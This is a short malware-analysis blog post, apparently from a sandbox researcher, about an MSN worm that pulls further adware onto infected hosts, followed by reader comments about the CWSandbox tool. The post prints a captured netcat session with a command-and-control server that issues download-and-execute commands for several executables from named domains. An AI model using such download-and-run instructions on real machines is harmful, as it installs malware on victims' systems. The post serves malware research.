CWSandbox vs. MSN Worms

The very good weblog from F-Secure had recently an entry entitled "MSN Worm Used to Download Adware Programs" (thanks common for pointing this out!). For downloading additional malware to the infected hosts, it uses a very simple transfer mechanism on TCP port 80:
$ nc XXX.64.38.YYY 80
down http://www.lollpics.net/[Removed] a.exe;shell a.exe;
down http://promo.dollarrevenue.com/webmasterexe/[Removed] drsmartload1135a.exe;
shell drsmartload1135a.exe;
down http://www.uglyphotos.net/[Removed] Yinstall.exe;
shell Yinstall.exe;
down http://www.lollpics.net/[Removed] mny.exe;
shell mny.exe;
shell a.exe;
shell a.exe;
shell a.exe;

So the infected host just contacts XXX.64.38.YYY on TCP port 80 and then receives instructions to download several files, which are executed in the next step. Currently, four additional pieces of malware are installed on the compromised machine, on of them being again Adware related to dollarrevenue.com. A full analysis report (detailed XML report) generated by CWSandbox is also available.

And a link from a reader (thanks Jean-Philippe!): Trend Micro launches anti-botnet service. Seems like there are now several companies who offer such services, let's see who is successful...

Trackbacks

    No Trackbacks

Comments

Display comments as (Linear | Threaded)

  1. adulau says:

    is CWSandbox sourcecode available somewhere ?

    Thanks a lot,

  2. Thorsten says:

    CWSandbox source code is not available. There are two ways to get a copy of the tool:

    - buy a license from Sunbelt
    - researcher version for universities

    If you want more information, just contact me...

  3. martin says:

    hi >> i want 2 buy CWSandbox ???
    help me ^_^


Add Comment


Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
E-Mail addresses will not be displayed and will only be used for E-Mail notifications

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

 
Submitted comments will be subject to moderation before being displayed.